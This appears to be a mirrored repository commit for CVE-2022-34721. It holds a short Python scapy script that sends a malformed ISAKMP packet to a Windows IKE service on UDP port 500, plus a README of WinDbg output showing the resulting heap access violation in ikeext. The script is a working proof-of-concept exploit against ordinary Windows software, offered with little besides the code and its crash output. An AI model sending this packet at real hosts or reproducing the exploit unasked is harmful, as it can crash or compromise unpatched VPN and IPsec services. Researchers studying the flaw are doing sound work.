crash.software
Projects
Pull Requests
Issues
Builds
CVE-2022-34721
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2022-34721 Commits c7227aaa
🤬
  • ■ ■ ■ ■ ■ ■
    CVE-2022-34721.py
     1 +from scapy.all import *
     2 +from scapy.contrib.ikev2 import *
     3 +from scapy.layers.isakmp import *
     4 +import socket, time
     5 + 
     6 +target = ("192.168.159.134", 500)
     7 + 
     8 + 
     9 +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
     10 + 
     11 +pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)
     12 +pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")
     13 + 
     14 +sock.sendto(raw(pkt), target)
     15 + 
  • ■ ■ ■ ■ ■ ■
    README.md
     1 +```
     2 +(128.414): Access violation - code c0000005 (first chance)
     3 +First chance exceptions are reported before any exception handling.
     4 +This exception may be expected and handled.
     5 +ikeext!IkeQueueRecvRequest+0x158:
     6 +00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax] ds:0000017a`08459000=????????????????????????????????
     7 + 
     8 +0:005> r
     9 +rax=0000017a08459000 rbx=0000000000000000 rcx=00000008905fef70
     10 +rdx=ffffffffffffc000 rsi=00000008905feff0 rdi=0000017a08456f10
     11 +rip=00007ffb9e48d138 rsp=00000008905fef30 rbp=00000008905fefa0
     12 + r8=0000000000000000 r9=0000000000000000 r10=0000017a08459000
     13 +r11=0000017a08459000 r12=0000000000000000 r13=0000017a0843cb80
     14 +r14=0000017a08456f20 r15=0000000000000001
     15 +iopl=0 nv up ei pl zr na po nc
     16 +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
     17 +ikeext!IkeQueueRecvRequest+0x158:
     18 +00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax] ds:0000017a`08459000=????????????????????????????????
     19 + 
     20 +0:005> !heap -p -a @rax
     21 + address 0000017a08459000 found in
     22 + _DPH_HEAP_ROOT @ 17a08281000
     23 + in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
     24 + 17a08285a28: 17a08459000 0 - 17a08458000 2000
     25 +ReadMemory error for address 0000017a08459000
     26 + 00007ffbc8177e7f ntdll!RtlDebugAllocateHeap+0x000000000000003f
     27 + 00007ffbc811e1fa ntdll!RtlpAllocateHeap+0x000000000009c70a
     28 + 00007ffbc807fcad ntdll!RtlpAllocateHeapInternal+0x000000000000098d
     29 + 00007ffb9e486910 ikeext!WfpMemAlloc+0x0000000000000020
     30 + 00007ffb9e48d0ce ikeext!IkeQueueRecvRequest+0x00000000000000ee
     31 + 00007ffb9e4f1c0d ikeext!IkeReinjectReassembledPacket+0x0000000000000181
     32 + 00007ffb9e4f17ed ikeext!IkeInsertFragEntry+0x0000000000000259
     33 + 00007ffb9e4f1865 ikeext!IkePostPayloadProcessFrag+0x0000000000000031
     34 + 00007ffb9e4f1564 ikeext!IkeHandlePayloadFrag+0x00000000000000ac
     35 + 00007ffb9e507652 ikeext!IkeHandleMMPacketDispatchAuthip+0x000000000000005e
     36 + 00007ffb9e4ead86 ikeext!IkeProcessPacket+0x00000000000002f2
     37 + 00007ffb9e47fc84 ikeext!IkeProcessPacketDispatch+0x0000000000000fd4
     38 + 00007ffb9e47bb9c ikeext!IkeHandleRecvRequest+0x000000000000000c
     39 + 00007ffbc809e7e9 ntdll!TppSimplepExecuteCallback+0x0000000000000099
     40 + 00007ffbc8086964 ntdll!TppWorkerThread+0x0000000000000644
     41 + 00007ffbc7cc7974 KERNEL32!BaseThreadInitThunk+0x0000000000000014
     42 + 00007ffbc80ca2f1 ntdll!RtlUserThreadStart+0x0000000000000021
     43 + 
     44 +
     45 +0:005> dq @rax
     46 +0000017a`08459000 ????????`???????? ????????`????????
     47 +0000017a`08459010 ????????`???????? ????????`????????
     48 +0000017a`08459020 ????????`???????? ????????`????????
     49 +0000017a`08459030 ????????`???????? ????????`????????
     50 +0000017a`08459040 ????????`???????? ????????`????????
     51 +0000017a`08459050 ????????`???????? ????????`????????
     52 +0000017a`08459060 ????????`???????? ????????`????????
     53 +0000017a`08459070 ????????`???????? ????????`????????
     54 + 
     55 +0:005> k
     56 + # Child-SP RetAddr Call Site
     57 +00 00000008`905fef30 00007ffb`9e4f1c0d ikeext!IkeQueueRecvRequest+0x158
     58 +01 00000008`905fefd0 00007ffb`9e4f17ed ikeext!IkeReinjectReassembledPacket+0x181
     59 +02 00000008`905ff110 00007ffb`9e4f1865 ikeext!IkeInsertFragEntry+0x259
     60 +03 00000008`905ff180 00007ffb`9e4f1564 ikeext!IkePostPayloadProcessFrag+0x31
     61 +04 00000008`905ff1c0 00007ffb`9e507652 ikeext!IkeHandlePayloadFrag+0xac
     62 +05 00000008`905ff200 00007ffb`9e4ead86 ikeext!IkeHandleMMPacketDispatchAuthip+0x5e
     63 +06 00000008`905ff230 00007ffb`9e47fc84 ikeext!IkeProcessPacket+0x2f2
     64 +07 00000008`905ff2f0 00007ffb`9e47bb9c ikeext!IkeProcessPacketDispatch+0xfd4
     65 +08 00000008`905ff850 00007ffb`c809e7e9 ikeext!IkeHandleRecvRequest+0xc
     66 +09 00000008`905ff880 00007ffb`c8086964 ntdll!TppSimplepExecuteCallback+0x99
     67 +0a 00000008`905ff8d0 00007ffb`c7cc7974 ntdll!TppWorkerThread+0x644
     68 +0b 00000008`905ffbc0 00007ffb`c80ca2f1 KERNEL32!BaseThreadInitThunk+0x14
     69 +0c 00000008`905ffbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
     70 +```
     71 + 
Please wait...
Page is in error, reload to recover